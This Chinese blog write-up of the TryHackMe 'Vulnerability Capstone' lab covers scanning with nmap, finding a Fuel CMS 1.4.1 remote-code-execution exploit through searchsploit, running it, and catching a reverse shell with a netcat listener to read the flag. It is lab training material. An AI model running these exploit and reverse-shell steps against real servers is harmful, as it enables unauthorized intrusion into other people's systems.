当前位置: 首页 > article >正文

TryHackMe-Vulnerability Capstone练习

article 2025/3/11 0:36:24

本文相关的TryHackMe实验房间链接:TryHackMe | Vulnerability Capstone

先nmap扫一下

接下来我们访问一下

接下来我们searchsploit找一下漏洞

searchsploit Fuel CMS

执行漏洞exp(此处使用TryHackMe中的box)

如果使用本地机需要下载exp:https://gist.github.com/anir0y/8529960c18e212948b0e40ed1fb18d6d#file-fuel-cms-py 

cd /usr/share/exploits/vulnerabilitiescapstone
python exploit.py 10.10.241.131

准备侦听

nc -lvnp 1234

shell_me
10.10.136.33:1234

找到目标文件: 

flag:THM{ACKME_BLOG_HACKED} 

答题:

fuel CMS 1.4.1 - Remote Code Execution (1) - Linux webapps Exploit (exploit-db.com)

 

参考:【THM】Vulnerability Capstone-练习 - Hekeatsll - 博客园 (cnblogs.com) 


http://www.kler.cn/a/230883.html

相关文章:

  • 回归预测 | Matlab实现ABC-BP人工蜂群算法优化BP神经网络多变量回归预测
  • 1.0 Zookeeper 分布式配置服务教程
  • c++设计模式之装饰器模式
  • 24炸了,计算机跨考还有可行性吗?
  • idea开发工具的简单使用与常见问题
  • COMSOL接触(高度非线性)仿真常见报错及解决方法总结
  • aspose-words字体转换
  • Mathtype与word粘贴快捷键冲突word中Mathtype始终灰色
  • 【大数据面试题】004 Flink状态后端是什么
  • 机器学习 | 一文看懂SVM算法从原理到实现全解析
  • 嵌入式学习Day14 C语言 --- 位运算
  • Python程序员面试题精选及解析(2)
  • JAVA中的模版设计模式
  • 【前端模板】bootstrap5披萨餐厅网站Pizza King平台(电商适用,附源码)
  • RabiitMQ延迟队列(死信交换机)
  • 3.2-媒资管理之MinIo分布式文件系统+上传图片
  • 从零学习Linux操作系统 第二十五部分 文本处理工具
  • 编码技巧——基于Socket通信的接口调用
  • C程序设计(第5版)谭浩强习题解答 第10章 对文件的输入输出
  • vue-cil的watch函数详解